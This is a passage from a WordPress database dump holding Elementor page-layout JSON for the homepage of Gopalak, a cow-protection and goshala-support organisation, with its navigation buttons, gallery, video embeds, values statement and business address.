leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9862,1656,'_elementor_page_assets','a:0:{}'),(9864,1657,'_elementor_edit_mode','builder'),(9865,1657,'_elementor_template_type','wp-page'),(9866,1657,'_elementor_version','3.7.8'),(9867,1657,'_wp_page_template','elementor_canvas'),(9868,1657,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"0\",\"bottom\":\"174\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 